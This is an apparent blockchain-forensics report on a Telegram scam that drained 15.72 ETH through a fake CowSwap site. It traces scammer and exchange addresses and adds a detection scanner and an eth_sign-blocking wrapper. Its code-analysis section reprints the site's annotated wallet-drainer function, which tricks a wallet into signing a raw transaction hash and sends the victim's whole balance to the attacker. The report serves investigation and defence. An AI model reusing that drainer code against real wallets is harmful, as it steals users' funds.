# Telegram Social Engineering

## Case Summary

**Brief**: `Victim: Alias Redacted` was scammed out of 15.72 Ethereum via a Telegram social engineering attack. The victim was seeking mentorship in cryptocurrency trading and was contacted by an individual claiming to assist users in learning proper trade analysis and execution. This individual, going by the Telegram username `@ranacrypto10x`, requested that the victim interact with an alleged "Trust Wallet" found at the `cowcrypto[.]io` website. After interacting with the scam website, the victim reported observing funds exiting their wallet, address `0xb43fC04B6a6cc56b0a293cC8541E7779CB058fAf`, and being sent to `0xCdd01a8ed1C126d3291E068bc92c3407E9beD6C6`.

Event Date: **February 27, 2024**

Theft Event Ethereum Transaction: `0x931660147c0f6e5abe8b1f19984f12f8073d20697ac75f6006764a9ca34a8586`

#### Sample from `cowcrypto[.]io`

[cowcrypto.io - urlscan.io](https://urlscan.io/result/5b32c088-ecf6-40b0-a669-ed76eca70a91/#transactions)

#### Sample from `cowcrypto[.]io/swap[.]html`

[cowcrypto[.]io/swap[.]html - urlscan.io](https://urlscan.io/result/adda7ecd-9939-46b0-bd79-fefe5acc7316/#transactions)

## Address Analysis

### Address Overview

- **Scammer Wallet Address**: `0xCdd01a8ed1C126d3291E068bc92c3407E9beD6C6`
- **Victim Wallet Address**: `0xb43fC04B6a6cc56b0a293cC8541E7779CB058fAf`

The victim's address was reviewed for on-chain approvals and smart contract interactions; none were observed on the Ethereum network.
Funds were stolen on the Ethereum blockchain network in the transaction with hash `0x931660147c0f6e5abe8b1f19984f12f8073d20697ac75f6006764a9ca34a8586`.

### Transactions Analysis

- Theft transaction visualization below:

```mermaid
flowchart TB
    subgraph transaction
        id1[0x931660147c0f6e5abe8b1f19984f12f8073d20697ac75f6006764a9ca34a8586]
        click id1 "https://app.dedaub.com/arbitrum/tx/0x931660147c0f6e5abe8b1f19984f12f8073d20697ac75f6006764a9ca34a8586" "0x931660147c0f6e5abe8b1f19984f12f8073d20697ac75f6006764a9ca34a8586"
        subgraph Sender
            s_address["Address: 0xb43fC04B6a6cc56b0a293cC8541E7779CB058fAf"]
            click s_address "https://app.dedaub.com/arbitrum/address/0xb43fC04B6a6cc56b0a293cC8541E7779CB058fAf/overview" "0xb43fC04B6a6cc56b0a293cC8541E7779CB058fAf"
        end
        id2[transfer: 15.721 Ethereum]
        subgraph Recipient
            r_address["Address: 0xCdd01a8ed1C126d3291E068bc92c3407E9beD6C6"]
            click r_address "https://app.dedaub.com/arbitrum/address/0xCdd01a8ed1C126d3291E068bc92c3407E9beD6C6/overview" "0xCdd01a8ed1C126d3291E068bc92c3407E9beD6C6"
        end
    end
    subgraph "Transaction Data"
        evt_data["Date: 2024-02-27 \n Chain: ETH"]
    end
    s_address --> id2 --> r_address
```

## Associated Addresses

### Direct Associations

- Addresses directly connected to the primary address(es) under investigation are listed and described below.
- Direct Associations Cluster:

| associated_scammer_instance_label | directly_associated_scammer_addr | potentially_associated_eth_txn |
| --- | --- | --- |
| 0x955ca4dcce379988823b24f8f289703f49ed7981 | 0x955ca4dcce379988823b24f8f289703f49ed7981 | 0xa883aca5cc2c63a4374419e62d999d6cac36afc721ded7b61c2239695a65d261 |
| 0x2ac42ceee570a60be894b933ef4d2bf6075b5dd1 | 0x2ac42ceee570a60be894b933ef4d2bf6075b5dd1 | 0xcf4a772b489236c64b39b23b2d7ce781115fb47e4f93d8fc530dff3154f96a1b |
| 0x97b29a945cfc47e014f2d0acc808a3edee87e3ac | 0x97b29a945cfc47e014f2d0acc808a3edee87e3ac | 0xff77512f20e902841f77dff6557c65207b8fdbf7d0607c091ef1fe6a18d3bf92 |
| 0x719b2202cae9f9e4171f2f1975beb47ce71d5b57 | 0x719b2202cae9f9e4171f2f1975beb47ce71d5b57 | 0x911ad4935a2a08f063767a0a4b572baccbb9f2098d1e978aae0af6300355be44 |
| 0xcc2121515b589dd1f35878669b52fe109da059a2 | 0xcc2121515b589dd1f35878669b52fe109da059a2 | 0x40920ce56d4f2941359c89e2658e485c1d9b6e39879474a713f67a47fa6465b4 |
| 0x0c06f558695e5f3e4cab286d7c5f585242d3d87e | 0x0c06f558695e5f3e4cab286d7c5f585242d3d87e | 0x1d342c7090c8562d54bf8e20130ec7a7c0e1e607ce360380d17cdce0290b452f |

### Associated Deposit Addresses

- Addresses indirectly connected to the primary address(es) are explored and analyzed below.
- Associated Deposit Addresses Cluster:

| chain | address | label | link |
| --- | --- | --- | --- |
| ethereum | 0x979f946408bf5ff7092d5c0bc901026aabfa614b | KuCoin_Deposit_0x979f | https://app.dedaub.com/ethereum/address/0x979f946408bf5ff7092d5c0bc901026aabfa614b/overview |
| ethereum | 0xc9805f23898e05c018c4b4f2550f2daeaf73e5b6 | bitrefill_dep_0xc9805f23898e05 | https://app.dedaub.com/ethereum/address/0xc9805f23898e05c018c4b4f2550f2daeaf73e5b6/overview |
| ethereum | 0x73ee457b4e36bc21965b66c5eba8ab424016e2ad | Bitrefill_Deposit_0x73ee | https://app.dedaub.com/ethereum/address/0x73ee457b4e36bc21965b66c5eba8ab424016e2ad/overview |
| ethereum | 0x392072947f76c0fcd46258d3bdfc2533f6d1ddc6 | kucoin_deposit_0x392072947f76c | https://app.dedaub.com/ethereum/address/0x392072947f76c0fcd46258d3bdfc2533f6d1ddc6/overview |
| ethereum | 0xfd4e61bd9b4156701b0a9b88dcf42489ad6c0b1e | blockchain.com_dep_0xfd4e61bd9 | https://app.dedaub.com/ethereum/address/0xfd4e61bd9b4156701b0a9b88dcf42489ad6c0b1e/overview |
| ethereum | 0x58638c40d18b2b09fb344e40ab0f8483c565a663 | Bitrefill_Deposit_0x5863 | https://app.dedaub.com/ethereum/address/0x58638c40d18b2b09fb344e40ab0f8483c565a663/overview |
| ethereum | 0xb2417b6e7ee8be01e4744d6a3627e232c64fd925 | Bitrefill_Deposit_0xb241 | https://app.dedaub.com/ethereum/address/0xb2417b6e7ee8be01e4744d6a3627e232c64fd925/overview |
| ethereum | 0x4282a7406f32e9a3b92f32fceda33ce27822425d | bitrefill_0x4282a7406f32e9a3b9 | https://app.dedaub.com/ethereum/address/0x4282a7406f32e9a3b92f32fceda33ce27822425d/overview |

## Anomalous Activity Analysis

From the victim's Trust Wallet browser history it can be observed that the websites interacted with were:

- `cowcrypto[.]io/swap[.]html`
- `cowcrypto[.]io/?utm_source=Trust_iOS_Browser`

![Victim's Trust Wallet browser history](https://hackmd.io/_uploads/rJlVn1Ypa.png =400x400)

Victim's Trust Wallet browser history

## Technical Analysis

### Overall Structure of `Cowcrypto.io`

![cowcrypto_file_structure](https://hackmd.io/_uploads/H1-H01tpa.png =400x)

File structure of: `cowcrypto[.]io/swap[.]html`

From a controlled deployment of the instance, it was concluded that the files of primary significance are `connect.js` and `swap.html`. `connect.js` is the JavaScript file containing the logic that runs when the user interacts with the website, while `swap.html` is responsible for the layout of the website frontend but also includes components that define the website interaction. The relevant samples are addressed in greater depth below.

![cows](https://hackmd.io/_uploads/Syzl01FTT.png =700x)

Sample from `connect.js` showing the encoding of the malicious actor's wallet address `0xCdd01a8ed1C126d3291E068bc92c3407E9beD6C6`, stored as the base64 string `MHhDZGQwMWE4ZWQxQzEyNmQzMjkxRTA2OGJjOTJjMzQwN0U5YmVENkM2`.

### Code Summary

This section analyses the asset theft operation, which exploits the trust of victims by impersonating the reputable cryptocurrency ["meta-DEX aggregator"](https://blog.cow.fi/how-cow-swap-solves-the-mev-problem-fd35b0127390?gi=5820b2e6ac7f#:~:text=CoW%20Swap%20is%20a%20meta,all%20AMMs%20and%20DEX%20aggregators), CowSwap.io. By misleading users into interacting with a malicious clone hosted at `cowcrypto[.]io/swap[.]html`, the attackers execute unauthorized transactions from the victims' Ethereum wallets. The JavaScript snippet reproduced below is the critical component of this scheme: it is the mechanism used to siphon Ethereum to a specific wallet address, which is stored base64-encoded and decodes to `0xCdd01a8ed1C126d3291E068bc92c3407E9beD6C6`.
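The base64-wrapped destination address shown in the `connect.js` sample is a pattern an analyst can check for mechanically when triaging a suspected clone site. The following scanner is an added example, not code from the report or from the cowcrypto site: it looks for string literals that decode to an Ethereum address and for the accompanying indicators (runtime `atob` decoding, a raw-hash `sign` call, and direct broadcast of a signed transaction). The function and indicator names are this example's own, and the sample source it runs on is a constructed excerpt shaped like the real snippet, not a copy of it.

```javascript
// Added triage helper, not code from the report or from the cowcrypto sample.
// Scans JavaScript source for a base64 literal that decodes to an Ethereum
// address, plus the calls that typically accompany that obfuscation.

const ADDRESS = /^(0x)?[0-9a-fA-F]{40}$/;
// A 42-byte "0x..." address is 56 base64 chars; a 40-byte bare address is 54 + "==".
const B64_LITERAL = /["']([A-Za-z0-9+/]{54,56}={0,2})["']/g;
const INDICATORS = {
  decodesAtRuntime: /\batob\s*\(/,                            // base64 decoded inside the page
  signsRawHash: /["']sign["']\]\s*\(|\.sign\s*\(/,             // web3.eth.sign(hash, account), i.e. eth_sign
  broadcastsSignedTx: /sendSignedTransaction|eth_sendRawTransaction/,
};

// Returns the decoded addresses found and a boolean per indicator.
function scanDrainerIndicators(source) {
  const encodedAddresses = [];
  for (const match of source.matchAll(B64_LITERAL)) {
    const encoded = match[1];
    if (encoded.length % 4 !== 0) continue;                   // not well-formed base64
    const decoded = Buffer.from(encoded, 'base64').toString('latin1');
    if (ADDRESS.test(decoded)) encodedAddresses.push({ encoded, address: decoded });
  }
  const flags = Object.fromEntries(
    Object.entries(INDICATORS).map(([name, re]) => [name, re.test(source)])
  );
  return { encodedAddresses, ...flags };
}

// Constructed excerpt mimicking the shape of the connect.js sample (not a copy of it).
const SAMPLE_CONNECT_JS = `
  const k = {
    'gasLimit': "22000",
    'to': atob("MHhDZGQwMWE4ZWQxQzEyNmQzMjkxRTA2OGJjOTJjMzQwN0U5YmVENkM2"),
    'value': '0x' + j["toString"](16),
  };
  await b["eth"]['sign'](n, c)["then"](async a => {
    await b["eth"]["sendSignedTransaction"](h);
  });
`;

console.log(scanDrainerIndicators(SAMPLE_CONNECT_JS));
```

Hex-encoded transaction hashes and addresses also consist of base64-alphabet characters, so the scanner only reports a literal when the decoded bytes themselves form an address; a bare 64-hex-character hash therefore does not produce a false positive.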
The snippet first obtains the victim's connected account through the Web3 provider supplied by Moralis, then reads the account's full ETH balance, subtracts a reserve for gas (22000 gas at twice the current gas price), and builds a transaction that sends the remainder to the attacker's address. Instead of asking the wallet to send that transaction (which would show the user a transfer of nearly their whole balance), it asks the wallet for a raw `eth_sign` over the transaction hash, so the wallet prompt shows only an opaque hex value. The returned signature is split into `r`, `s` and a recovery byte, the recovery byte is adjusted into an EIP-155 `v`, the three values are spliced back into the transaction, and the now-signed transaction is broadcast with `sendSignedTransaction`. This is the technical planning behind the theft, and it is why understanding what a wallet is actually being asked to sign matters.

```javascript
async function l() {
  const b = new Web3(Moralis['provider']);
  const c = (await b["eth"]["getAccounts"]())[0];            // victim's connected account
  chainId = await b["eth"]["getChainId"]();
  e = await b["eth"]["getBalance"](c);                        // victim's full ETH balance (wei)
  await b["eth"]["getTransactionCount"](c, "pending")["then"](async d => {
    const f = await b["eth"]["getGasPrice"]();
    const g = b["utils"]["toHex"](Math["floor"](f * 1.3));    // gas price for the drain tx (130% of current)
    const h = new b["utils"]['BN']("22000");
    const i = h * Math["floor"](f * 2);                       // gas reserve: 22000 gas at 2x gas price
    const j = e - i;                                          // everything else goes to the attacker
    console["log"]("Sending " + b["utils"]['fromWei'](j["toString"](), "ether") + ' ETH from ' + c + '...');
    // MHhDZGQwMWE4ZWQxQzEyNmQzMjkxRTA2OGJjOTJjMzQwN0U5YmVENkM2 = base64 encoded: 0xCdd01a8ed1C126d3291E068bc92c3407E9beD6C6
    const k = {
      'nonce': b["utils"]["toHex"](d),
      'gasPrice': g,
      'gasLimit': "22000",
      'to': atob("MHhDZGQwMWE4ZWQxQzEyNmQzMjkxRTA2OGJjOTJjMzQwN0U5YmVENkM2"),   // attacker address decoded at runtime
      'value': '0x' + j["toString"](16),
      'data': '0x',
      'v': a,                                                 // `a` is not defined in this excerpt; EIP-155 places the chain id in v before signing
      'r': '0x',
      's': '0x'
    };
    let l = new ethereumjs['Tx'](k);
    const m = '0x' + l["serialize"]()["toString"]('hex');    // unsigned, RLP-serialised transaction
    const n = b["utils"]['sha3'](m, { 'encoding': 'hex' });   // its keccak256 hash, i.e. the signing hash
    console["log"]("rawTx1:", m);
    console["log"]("rawHash1:", n);
    // eth_sign over the raw hash: the wallet shows an opaque hex value, not a transfer prompt
    await b["eth"]['sign'](n, c)["then"](async a => {
      const c = a["substring"](2);
      const d = '0x' + c["substring"](0, 64);                 // r
      const e = '0x' + c["substring"](64, 128);               // s
      const f = parseInt(c["substring"](128, 130), 16);       // recovery byte (27 or 28)
      const g = b["utils"]['toHex'](f + chainId * 2 + 8);     // EIP-155 v = chainId*2 + 35 + (f - 27)
      console["log"]('r:', d);
      console['log']('s:', e);
      console["log"]('y:', g["toString"]("hex"));
      l['r'] = d;
      l['s'] = e;
      l['v'] = g;
      console["log"](l);
      const h = '0x' + l["serialize"]()["toString"]("hex");   // now a fully signed transaction
      const i = b["utils"]["sha3"](h, { 'encoding': "hex" });
      console["log"]('rawTx:', h);
      console['log']("rawHash:", i);
      // broadcast directly; the wallet never saw a transaction, only a hash
      await b["eth"]["sendSignedTransaction"](h)["then"](a => console['log'](a))["catch"](a => console["log"](a));
    })["catch"](a => console["log"](a));
  });
}
```

### In Depth Code Analysis

The JavaScript above is part of a larger mechanism for interacting with the Ethereum blockchain and ERC-20 tokens through Web3 interfaces, with the Moralis platform as a backend service for dApp development. A breakdown of its critical functionalities:

1. **ERC-20 Token Handling**: The code initializes an interaction framework for ERC-20 tokens, specifying methods for common token operations such as `transfer` and `balanceOf`. These operations are what a dApp needs in order to read token balances or initiate token transfers on behalf of the user.
2. **Web3 and Moralis Integration**: The script integrates Web3.js and Moralis, which establish the blockchain connection, manage account interactions, and execute blockchain transactions. Moralis provides a streamlined interface for dApp development, giving easy access to user wallet accounts and transaction capabilities.
3. **Phishing Mechanisms**: Central to the code is the `i()` function, which appears to review the user's ERC-20 token balances automatically and attempts to transfer tokens out to a predefined address without explicit user consent. Together with the `l()` function that orchestrates the ETH transfer, this indicates a phishing operation designed to siphon assets from unsuspecting users' wallets.
4. **UI Deception**: The script manipulates UI elements to trick users into engaging with harmful functionality.
   It dynamically displays or hides connection buttons based on the wallet's connection status, which can mislead users into performing actions that trigger unauthorized transactions.
5. **Stealthy Execution on Load**: The code is structured to execute these malicious activities automatically when the page loads, reducing the likelihood that users detect and prevent the asset transfers. This is characteristic of a phishing scam aiming to maximize asset extraction before detection.
6. **Automatic Network Switching and Event Handling**: The code attempts to switch the wallet to a specific chain ID if it is connected to a different network, so that the transactions execute on the intended network. Event listeners for account changes and disconnects adjust the UI and potentially reset the phishing logic, maintaining the illusion of a legitimate application.

In summary, although the script uses legitimate Web3 and ERC-20 interaction patterns, its construction and behavior indicate malicious intent, specifically phishing. Users are advised to exercise extreme caution and to understand the actions and permissions requested by any Web3 application or dApp before interacting with it or approving transactions or signatures. This analysis underscores the need for vigilance in the growing space of decentralized applications and cryptocurrency transactions.

## Report Objectives

<aside>
💡 This report has been composed to the best of our knowledge and capabilities in the hope that law enforcement can assist with potential asset recovery by "freezing assets" while they are held as the virtual currency USDT (Tether); a pattern has been observed in which the malicious actor seemingly consolidates and converts to Tether approximately every three weeks. Moreover, we would greatly appreciate the assistance of law enforcement in engaging the exchanges Coinbase and Binance.
</aside>

## Conclusion

Currently, based on the values transacted through the **Scammer Wallet Address** `0xCdd01a8ed1C126d3291E068bc92c3407E9beD6C6`, it appears that the victim was subject to a variant of social engineering and potentially even phishing-as-a-service.

## References

For a more comprehensive visual of the blockchain addresses interacted with, please refer to the graphs below:

- [cowcrypto.io_color_coded](https://metasleuth.io/result/eth/0xa883aca5cc2c63a4374419e62d999d6cac36afc721ded7b61c2239695a65d261?source=a9d53d66-e721-41be-b268-3d83799f461c)
- [cowcrypto.io_scammer_correlations](https://metasleuth.io/result/eth/0x685246f9fabfdaadf2cb5cbc4f989b5dff949f79a853e05857b062cdabb93809?source=0f38d99d-c184-49b1-9d3a-e5f628666463)
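The `l()` function analysed above depends on the wallet honouring a legacy `eth_sign` request over a bare 32-byte hash; a signature over a prefixed `personal_sign` message or typed data cannot be spliced into a raw transaction the same way. The following is an added defensive example, not code from the report or from the cowcrypto site: it wraps an EIP-1193 provider (`window.ethereum` in a browser; a constructed mock here so it runs offline) so that `eth_sign` requests are refused and logged while ordinary requests pass through, and it includes a small function showing that the sample's `f + chainId * 2 + 8` is exactly the EIP-155 recovery value. The names `classifySignRequest`, `guardProvider` and `eip155V` are this example's own.

```javascript
// Added defensive example, not code from the report or from the cowcrypto sample.
// Wraps an EIP-1193 provider so legacy eth_sign requests are blocked and logged.

const RAW_DIGEST = /^0x[0-9a-fA-F]{64}$/;

// Decide whether a request should reach the wallet. eth_sign params are [address, data].
function classifySignRequest(method, params) {
  if (method === 'eth_sign') {
    const payload = params[1];
    const reason = RAW_DIGEST.test(payload)
      ? 'eth_sign over a 32-byte digest: if it is a transaction hash, the signature completes a broadcastable transaction'
      : 'legacy eth_sign signs arbitrary bytes without the personal_sign prefix';
    return { allow: false, reason };
  }
  // personal_sign and eth_signTypedData_v4 prefix or structure the payload, so a
  // signature over them cannot be reused as a raw transaction signature.
  return { allow: true, reason: 'ok' };
}

// The EIP-155 recovery value: chainId*2 + 35 + recid, where recid = f - 27 for an
// eth_sign recovery byte f of 27 or 28. The sample computes the same thing as f + chainId*2 + 8.
function eip155V(recoveryByte, chainId) {
  if (recoveryByte !== 27 && recoveryByte !== 28) throw new RangeError('recovery byte must be 27 or 28');
  return chainId * 2 + 35 + (recoveryByte - 27);
}

// Wrap a provider: every request is classified and logged; blocked ones throw
// before anything reaches the wallet.
function guardProvider(provider, log) {
  return {
    async request({ method, params = [] }) {
      const verdict = classifySignRequest(method, params);
      log.push({ method, allow: verdict.allow, reason: verdict.reason });
      if (!verdict.allow) throw new Error(`blocked ${method}: ${verdict.reason}`);
      return provider.request({ method, params });
    },
  };
}

// Constructed mock standing in for window.ethereum so the demo runs offline.
const mockProvider = { request: async ({ method }) => `${method}-result` };
const auditLog = [];
const guarded = guardProvider(mockProvider, auditLog);
const account = '0xb43fC04B6a6cc56b0a293cC8541E7779CB058fAf';   // victim address from the report
const constructedDigest = '0x' + 'ab'.repeat(32);              // constructed 32-byte hash

// Demo: a personal_sign passes through; an eth_sign over a raw hash is refused.
guarded.request({ method: 'personal_sign', params: ['0x48656c6c6f', account] })
  .then(result => console.log('allowed:', result))
  .then(() => guarded.request({ method: 'eth_sign', params: [account, constructedDigest] }))
  .catch(err => console.log(err.message))
  .finally(() => console.log(auditLog));
```

In a browser the wrapper would be installed around the injected provider before any dApp code runs; the audit log is what a wallet or extension would surface to the user, and the `eip155V` check is what makes it clear why a signature over "just a hash" is as good as a signed transfer.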